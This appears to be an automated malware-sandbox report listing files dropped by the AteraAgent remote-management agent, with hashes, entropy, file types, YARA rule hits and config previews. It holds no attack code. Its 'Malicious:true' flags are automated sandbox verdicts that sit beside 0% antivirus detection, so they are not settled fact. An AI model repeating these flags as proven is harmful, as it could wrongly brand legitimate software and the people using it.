                                                                                                                                                                                                                                                                                                                                  SHA1:6AF8E30872729E89FE0A7C01D99DACF4AE6726CF
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B3853CEBEA222ABB31C2B1E3D6CD19A2F6621ABB56954162751A2B592680676
                                                                                                                                                                                                                                                                                                                                  SHA-512:ABB6FE5216B412CD85E139D69657A40BEEBA00F2DD0DF1795AAD8CF27C13D9CE0EB2DCF3904CA445678D689CE56FA2C169ED7B40490181EA6B770B1A634A6D4B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7267524338984295
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:T2WWNv/jzSEhtimYtEq40uI7Sr2fqmxkNeo7R7L7c7xM757odHK9nPo21f5rxg06:a1NvbOtEq40uYSatEdHwWloA9Pb5rxgJ
                                                                                                                                                                                                                                                                                                                                  MD5:2356F25971B72EDBB3303AEA1BEFB9A1
                                                                                                                                                                                                                                                                                                                                  SHA1:60780C3E4F36829A0038BF56CD929148A0A0523C
                                                                                                                                                                                                                                                                                                                                  SHA-256:99C3F55737EBC53BA4EAA92FAAE23EC8AAB9149826E5D821D6BC976706BED237
                                                                                                                                                                                                                                                                                                                                  SHA-512:3252FE8D4A04F4EF79DB76DEB446FBA236E0B281E0B1B35488198D8A5D8EF0F4890ED68DB0E93CA17CE3783B6A6A4D71EF5F8979F917E05D4DDAC638DF082A60
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1152141
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9996934105504405
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Y0MtJOalt7fQwfM+tshGvx5LBhqAc9sDQPfs8+5iaSpFiz:65Lm++hGZ5LnZMO8f+5Aiz
                                                                                                                                                                                                                                                                                                                                  MD5:9A9B1FD85B5F1DCD568A521399A0D057
                                                                                                                                                                                                                                                                                                                                  SHA1:34ED149B290A3A94260D889BA50CB286F1795FA6
                                                                                                                                                                                                                                                                                                                                  SHA-256:88D5A5A4A1B56963D509989B9BE1A914AFE3E9EE25C2D786328DF85DA4A7820D
                                                                                                                                                                                                                                                                                                                                  SHA-512:7C1259DDDFF406FDAADB236BF4C7DFB734C9DA34FD7BAD9994839772E298EBF3F19F02EB0655E773BA82702AA9175337BA4416C561DC2CB604D08E271CC74776
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.139785828189609
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:avB4oeg/Po2Obb95bmrpeALHpZAgEpYinAMxCC8:ruQpbHbklAp7Hxx8
                                                                                                                                                                                                                                                                                                                                  MD5:3180C705182447F4BCC7CE8E2820B25D
                                                                                                                                                                                                                                                                                                                                  SHA1:AD6486557819A33D3F29B18D92B43B11707AAE6E
                                                                                                                                                                                                                                                                                                                                  SHA-256:5B536EDA4BFF1FDB5B1DB4987E66DA88C6C0E1D919777623344CD064D5C9BA22
                                                                                                                                                                                                                                                                                                                                  SHA-512:228149E1915D8375AA93A0AFF8C5A1D3417DF41B46F5A6D9A7052715DBB93E1E0A034A63F0FAAD98D4067BCFE86EDB5EB1DDF750C341607D33931526C784EB35
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1782
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.026919218581437
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3rrb7h+1/gYo27RgdSagFsg+w3Sg+CjdgDt:7rn4cwCR
                                                                                                                                                                                                                                                                                                                                  MD5:13CFEB2261E4DAEAA3C06F7A60078F91
                                                                                                                                                                                                                                                                                                                                  SHA1:D76B6D07D8FEC75789025FBAB18048AD193B1462
                                                                                                                                                                                                                                                                                                                                  SHA-256:6BBDCC477F0C1EFBD0129AC7716F96CC2844103169AAEBFF03D4C8F5C54745D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:F804155363FEB09427F7C8E968EAAA7DDA15F739769864A23C8A0FC9137151A03F02FB30B11F47A69DDCEFFF02BF933721C3757A3FB78C705D0537205BBD3A92
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhTLV:WFLV
                                                                                                                                                                                                                                                                                                                                  MD5:530F2E4E5E3DDA283DB3C78CC0C13297
                                                                                                                                                                                                                                                                                                                                  SHA1:CF60B778D32C9562B94411DA9DCD8FED2017AB84
                                                                                                                                                                                                                                                                                                                                  SHA-256:447163A4A3F1F10AFD9EC48F915085B3236F0FA7EDC9973C16925EDB5F6CF0CC
                                                                                                                                                                                                                                                                                                                                  SHA-512:DD4F7AF9A0F57707D1924BB504D3FC267B4898B909CF6E6ECD274BBC9B487A5CE5D8000E3FAD6EC0061E565C728455965C91F1B4E380227264AD2EE3E2990E28
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=6.0
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95792
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.184818983275012
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:GQ7brNBoXFbuhpLHbTOgemUu7+n3uRw1FlQRd5JY4t5K56y0sDrUfvPrhZwLXF7X:GQ/iwLWgeW+neRw1Hyd/YCs56y0sXUfG
                                                                                                                                                                                                                                                                                                                                  MD5:23C8674C75D5944445BF1C035E4A4789
                                                                                                                                                                                                                                                                                                                                  SHA1:A1255CEDEAC9F9A04B50C7814CD7C61A50623A19
                                                                                                                                                                                                                                                                                                                                  SHA-256:D2043F878740F643BF91F3EF798DBB9747904A1D503AAC4ED2108131F663AB37
                                                                                                                                                                                                                                                                                                                                  SHA-512:52ABA8350A05E9E5A672CB04CE528CFC4DA009247B2BD8B63096AF9A37C1F352A4C2BD12B03973AA1E733551F94F542814E425223DEF2AA33B595AA2DC555A95
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.002764283325334
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ocNQW9Tbp/VgiZi7sT5gdBxYJMcTnbJkI+eD7HxSR:ojobJVgiHMcr5Da
                                                                                                                                                                                                                                                                                                                                  MD5:10961147A546FFCD8B7C19771BA70198
                                                                                                                                                                                                                                                                                                                                  SHA1:5B63EEA0B2E53DB81AFB146D469E899E1E67DACF
                                                                                                                                                                                                                                                                                                                                  SHA-256:95C53735107ADCC39E6C3268335B2AD434E2364A007CC97B2147AF3A6EE837F3
                                                                                                                                                                                                                                                                                                                                  SHA-512:9830450FF9E8D2E6B74D8D8938A18DFB1BA008249D389FB923D5AAA25B7F8F9E5BAD4CB3FC13100C5F53B0CCEDA4E9427E90F2B733EA9BE0FFAA5D5F165C815E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.656654225594367
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:5Xh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl5XqQ:5Xh+tYmNyb8E9VF6IYinAM+oCaFXF
                                                                                                                                                                                                                                                                                                                                  MD5:96703E15C375B8A701C9D1F5BE8C4149
                                                                                                                                                                                                                                                                                                                                  SHA1:B058FA32FBDA52D70C1B966640B4824D5487ADC4
                                                                                                                                                                                                                                                                                                                                  SHA-256:3F830FA8F22EB09D59088705E26DCE964FB430722E91630B03EB15FCC48359A0
                                                                                                                                                                                                                                                                                                                                  SHA-512:3D7515BBFD018BCB24C69235A65F401BCF00D6932E412696FF31DC6EDE9436B2D4E5983450C9F88AF7B52D18949B4C1EFFEB9C3F94E85DCE57C4495F21D21A86
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.410547751816252
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:KQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAM/:K9ML8LW/usybGYVE8mZw+89Wu1e7Hxas
                                                                                                                                                                                                                                                                                                                                  MD5:20FC2DB17D09554BBC37785B3644DFC3
                                                                                                                                                                                                                                                                                                                                  SHA1:AAC4CA54730DB46145748AB419CF6BE3B39D2A74
                                                                                                                                                                                                                                                                                                                                  SHA-256:4151D6C627A324D9F2991A4D98BB7544926DB41B3211EDC1B2085922B1D1FC46
                                                                                                                                                                                                                                                                                                                                  SHA-512:62F6711FD2861BEA0FC214882678CF7F98CB53E8AF858C46CCC1F5B1F2FF9C22DCBD3A184A9DE9AD2D2148F0B529426DE7F793A63A459D72D2DCB048DF4E40FD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.13440642371392
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:hjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvr:h+e55LgIkTmyAAfTnMLvr
                                                                                                                                                                                                                                                                                                                                  MD5:A79C5395D945A1A369EA05D73B1170E4
                                                                                                                                                                                                                                                                                                                                  SHA1:937D030106FD7E88B61E4F4D1AC28A3B9FFA0AA4
                                                                                                                                                                                                                                                                                                                                  SHA-256:7580F72E7059A9DBCF41C94DC69ECCA0B3A983C010DE86B9A509A701163AFEC0
                                                                                                                                                                                                                                                                                                                                  SHA-512:176C719C2595A6A01041EC240D5341FAC5AB6137756FD70F71A1B5C5A6E9A923FB61760808840D439CDBAB70ADFAEE137B13600875E0BC3A209E501DB84C2AAD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071525670553409
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Y1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQm:Y1n1p9LdRN39aQZUq3
                                                                                                                                                                                                                                                                                                                                  MD5:022108AD251A8942E295269CA824DE07
                                                                                                                                                                                                                                                                                                                                  SHA1:05CE96EB21FF69C5ACE572405A39936E594B7043
                                                                                                                                                                                                                                                                                                                                  SHA-256:353FC27D930C31219086C6D391B0502AC298F6084DFCB3EA423DD1DAB3BA1907
                                                                                                                                                                                                                                                                                                                                  SHA-512:49028D3C1C7C8FAE813F294577B97EB0C66F2D62DF880072AD59679460D55A6DEB1546DDF07A7353563910E21F4D53F5FCB4BD421887D7B75429083CA200C16E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960711597816388
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:yBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUc:yBjk38WuBcAbwoA/BkjSHXP36RMGl
                                                                                                                                                                                                                                                                                                                                  MD5:25879E885A79F4548FD878EAF4A82396
                                                                                                                                                                                                                                                                                                                                  SHA1:AFB8D0BBD5687D2FC19C7A3FB66EA3DF1886DB8C
                                                                                                                                                                                                                                                                                                                                  SHA-256:3DF7B27F8649C95C56F1F68A040F29FB28EFF6756F8BA78C480DFBB541E59E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:39EB28B89A077D37FC8076A364B26ADFD348F6DC891AC08FACCFB071D3806C32AC0A3A5D82E8D4DE01DF6F9E1C4271CCABFA8FF7248CF6886BEF8FE4BDE51B6F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117274836584594
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:NZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHU:fgo0WPVTXg0
                                                                                                                                                                                                                                                                                                                                  MD5:66DEBCC5962642D31706EA1B067288A3
                                                                                                                                                                                                                                                                                                                                  SHA1:FB6A76C0E5189F66FE1D0E192349077A45BF437F
                                                                                                                                                                                                                                                                                                                                  SHA-256:8CBC47B453EA20F1EEA3337981A1A975A16B68B27AA156831D2B4AD0B63EA980
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C485C7D319BA9C019FBDCA48833D3628E6D9EA6F3AABFA47A519C363BA81D11265427FD470D5D665795B010A26E751DA404DBD70895E5EAFC83CBD50D83ED2B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676829122620627
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqXLP:TuhMaVmzDC67EpYinAMxC5
                                                                                                                                                                                                                                                                                                                                  MD5:C3CBDF33261AA0BAA8C11B4D713BA911
                                                                                                                                                                                                                                                                                                                                  SHA1:A486A2CFA6EF16B9DD005C689C767E47BF18D5A6
                                                                                                                                                                                                                                                                                                                                  SHA-256:0BD8B6B5D401001A2003486077BC095A2138B42DE7A52B212BD7A4AAD72A9E35
                                                                                                                                                                                                                                                                                                                                  SHA-512:132600340186128C7B8EA40D77DE9E5359A52949E7EE815CF959E2000A6EE178FCE26A2AAA2EBC56A48318EEAD3038189567CD5D14F9E977780373649C83F41D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):97328
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.241615255803021
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:rNSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxhP:rN3OWMsQ56vd2s+KuYc9RTJrP
                                                                                                                                                                                                                                                                                                                                  MD5:259DAAE7BD386F6AE1C50DEF93F9A274
                                                                                                                                                                                                                                                                                                                                  SHA1:70E68497781C4E7B931B11E9EFE702ECCFBC3AF7
                                                                                                                                                                                                                                                                                                                                  SHA-256:859758492E07C9297C1C5A0A31FA30129C23D479F442ADE01F4A51F78A0DED08
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D25CB5982E2D8A5EFA0056C120E1BD5AEC7E28DE4DEEC9BFA2BAEBFB0FABDC4A12369F901C8415CDD3402C9A0E8F8F338C1C5E3FEB1A2C0F45ED446AB80701B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.18032959054322
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:g3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnJ:S0qjCSRE+fw0kG71S
                                                                                                                                                                                                                                                                                                                                  MD5:CC3FFADF699BFB7F10A176AE306707E8
                                                                                                                                                                                                                                                                                                                                  SHA1:C0824E4E57FEBEF32E904E540BA369BB77ACD15A
                                                                                                                                                                                                                                                                                                                                  SHA-256:D48B4C4D3BED0F4662B98E557A0EDE24B6C3745E7BFFC114164A2FD33D947904
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC648768FA54D6F9A0FB70CE88960EE2137712FD7056F8FF28D2E222871D2FFA96B97C81E21D84CD71EA336F29D28977EAB57D858B2B7D1D7C7B2B01BB455C32
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.672454142602205
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
Category:dropped
Size (bytes):384543
Entropy (8bit):7.999457129580227
Encrypted:true
Malicious:false
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):177712
Entropy (8bit):5.81549541154566
Encrypted:false
Malicious:true
Yara Hits:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):546
Entropy (8bit):5.048902065665432
Encrypted:false
Malicious:true
Reputation:unknown
Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):12
Entropy (8bit):3.584962500721156
Encrypted:false
Malicious:false
Reputation:unknown
